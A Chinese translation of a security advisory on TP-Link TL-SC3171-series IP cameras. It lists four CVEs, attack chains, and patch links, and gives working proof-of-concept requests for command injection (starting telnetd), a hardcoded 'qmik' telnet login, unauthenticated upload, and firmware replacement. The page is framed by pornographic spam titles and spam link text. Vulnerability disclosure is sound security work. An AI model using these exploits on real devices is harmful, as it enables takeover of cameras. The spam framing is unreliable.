成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

TP-Link網絡攝像機的多個漏洞詳細分析

安全 漏洞
TP-LinkTL-SC3171 IP Cameras網絡攝像機的版本為LM.1.6.18P12_sign5的固件上存在多個漏洞,這些漏洞允許攻擊者做如下的事情:執行未經身份認證的遠程文件上傳、執行未經身份認證的固件升級以及用硬編碼身份憑證的shell執行任意命令等。

漏洞描述:

TP-LinkTL-SC3171 IP Cameras網絡攝像機的版本為LM.1.6.18P12_sign5的固件上存在多個漏洞,這些漏洞允許攻擊者做如下的事情:

1:[CVE-2013-2578]通過文件 /cgi-bin/admin/servetest執行任意命令。

2:[CVE-2013-2579]用硬編碼身份憑證的shell執行任意命令。

3:[CVE-2013-2580]執行未經身份認證的遠程文件上傳。

4:[CVE-2013-2581]執行未經身份認證的固件升級。

攻擊路徑:

通過結合這些漏洞,多個攻擊路徑可被利用。額外的攻擊路徑也是可用的,但這里的攻擊路徑可以讓你了解攻擊者如何危及受影響的的設備。

攻擊路徑1:

(驗證:無)

1:通過[CVE-2013-2581]漏洞上傳一個已經root的固件。

2:通過http:///cgi-bin/reboot 重啟設備。

攻擊路徑2:

(驗證:繞過)

1:通過http:///cgi-bin/hardfactorydefault將設備重置為出廠默認設置。之后,通過使用admin:admin作為有效的用戶和密碼繞過驗證。

2:通過http:///cgi-bin/reboot重啟設備。

3:通過[CVE-2013-2578]漏洞開啟Telnet服務。

4:使用用戶qmik(沒有密碼)登陸Telnet服務,并使該設備作為樞軸點。

受影響的設備和固件:

TP-Link TL-SC3130 (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3130G (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3171 (固件版本M.1.6.18P12_sign5及以下)
TP-Link TL-SC3171G (固件版本LM.1.6.18P12_sign5及以下)

其他的TP-Link網絡攝像機和固件版本可能也受影響。

供應商信息,解決方案和解決方法:

廠商提供的測試版修補固件版本鏈接如下:

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip

[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip

[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip

[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip

最終的正式版本將公布在未來數天,請聯系TP-LINK了解更多信息。

技術細節說明和PoC:

1:servetest中的操作系統命令注入

[CVE-2013-2578]文件/cgi-bin/admin/servetest有幾個參數可以被用于操作系統命令注入,這會導致通過身份驗證的用戶可以執行任意命令。下面的PoC啟動telnet服務:

GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: <a href="http://192.168.1.100/progress.htm">http://192.168.1.100/progress.htm</a>
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2

2:telnet服務中的硬編碼身份認證

[CVE-2013-2579]受影響的系統包含一個不需要密碼的硬編碼登錄,這會導致遠程攻擊者使用這個內置的telnet服務來登錄受影響設備的操作系統,用戶和密碼:

username: qmik
password: (none)

qmik用戶被允許執行命令su,這會導致以root權限執行任意命令。telnet服務可以用通過[CVE-2013-2578]漏洞開啟。

3:未經身份驗證的遠程文件上傳

[CVE-2013-2580]文件/cgi-bin/uploadfile允許未經身份驗證的用戶進行遠程文件上傳,下面是Python PoC:

import requests
 
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("<a href="http://192.168.1.100/cgi-bin/uploadfile">http://192.168.1.100/cgi-bin/uploadfile</a>", files={fileName: open(fileName, "rb")})

上傳文件(在本例中lala.tmp)將會被放置在/mnt/mtd目錄中。

4:未經身份驗證的遠程固件升級

[CVE-2013-2581]文件/cgi-bin/firmwareupgrade允許未經身份驗證的用戶執行遠程固件升級,PythonPoC如下:

import requests
 
requests.get("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)

引用:

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.

[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip.

[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip.

[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip.

[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip.

原文來自:http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2009-11-18 16:24:35

P-Link路由器

2009-09-25 14:23:39

2009-09-28 10:39:01

Hibernate基礎

2009-06-18 14:00:51

2024-12-25 15:05:07

2010-01-11 14:59:01

TP-Link交換機配

2009-12-03 17:41:40

PHP應用發展

2021-10-25 19:52:52

IntentFilte

2010-04-26 18:17:19

Oracle存儲過程

2009-09-14 13:50:35

LINQ編程模型

2009-09-08 15:56:50

Linq使用Group

2010-01-06 13:50:37

.NET Framew

2009-11-20 13:11:44

Oracle XML數

2010-07-28 13:00:58

無線路由配置

2009-09-09 09:48:43

Linq延遲加載

2009-09-14 16:21:34

LINQ To XML

2009-10-10 13:52:57

VB Update方法

2010-03-08 17:18:46

Linux du命令

2010-04-12 10:53:07

Oracle SQL

2010-04-26 14:32:21

Oracle SQL
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 中文字幕在线精品 | 婷婷成人在线 | 超碰在线播 | 成人在线视频网站 | 欧洲一级视频 | av中文字幕在线播放 | 亚洲精品成人 | 亚洲 精品 综合 精品 自拍 | 成人在线视频免费观看 | 日本成人中文字幕 | 天堂精品视频 | 国产精品视频网 | 7777在线视频免费播放 | 日本欧美大片 | 性精品 | 视频一区二区在线观看 | 日韩精品免费看 | 免费看大片bbbb欧美 | 久久久久国产精品午夜一区 | 久久99精品久久久久久 | 国产一区二区三区在线 | 黄色在线观看国产 | 国产精品1区2区 | 91在线看 | 日韩中文字幕区 | 精品婷婷| 日本久久www成人免 成人久久久久 | 黄色片在线观看网址 | 福利视频网 | 久一精品 | 日日碰碰 | 精品美女在线观看视频在线观看 | 成人精品一区二区三区中文字幕 | 亚洲三区在线 | 午夜国产羞羞视频免费网站 | 国产精品免费一区二区三区四区 | 一级a性色生活片久久毛片波多野 | 成人高清在线 | 久草网在线视频 | 黄网站色大毛片 | 日韩精品一二三 |